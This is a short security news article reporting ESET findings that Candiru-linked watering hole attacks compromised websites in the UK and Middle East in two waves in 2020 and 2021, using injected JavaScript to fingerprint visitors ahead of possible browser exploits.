Last Updated on 22/11/2021 by TheDigitalHacker
New evidence suggests that Israeli spyware vendor Candiru, which was recently added to the US government’s economic blacklist, carried out “watering hole” assaults against high-profile targets in the UK and the Middle East.
The strategic web compromises are thought to have happened in two waves, the first beginning in March 2020 and ending in August 2020, and the second beginning in January 2021 and ending in early August 2021, when the malicious scripts were removed from the targeted domains.
Watering hole attacks are a type of highly targeted intrusion in which a specific group of end-users is infected via backdooring websites that the group is known to visit with the purpose of gaining access to their computers for further exploitation.
The original attack chains involved injecting JavaScript code into websites from a remote attacker-controlled domain that was designed to collect and exfiltrate I.P. geolocation and system information about the victim machine, but only if the operating system in question was either Windows or macOS, implying that the campaign was designed to target computers rather than mobile devices. The final stage resulted in a possible browser remote code execution hack, allowing the attackers to take control of the computers.
The second wave, which began in January 2021, was more stealthy, as the malicious code was embedded in genuine WordPress scripts (“wp-embed.min.js”) rather than being added directly to the main HTML page, utilising the mechanism to load a script from a server under the attacker’s control. Furthermore, the fingerprinting script captured the default language, the list of fonts supported by the browser, the time zone, and the list of browser plugins in addition to system metadata.
The specific exploit and payload sent have yet to be determined. “This demonstrates that the operators have chosen to focus their operations and do not want to burn their zero-day exploits,” stated ESET malware researcher Matthieu Faou.
The campaign’s links to Candiru stem from the fact that some of the attackers’ command-and-control servers are similar to domains previously identified as belonging to the Israeli firm, not to mention the fact that it employs browser-based remote code execution exploits, raising the possibility that “the operators of the watering holes are Candiru customers.”
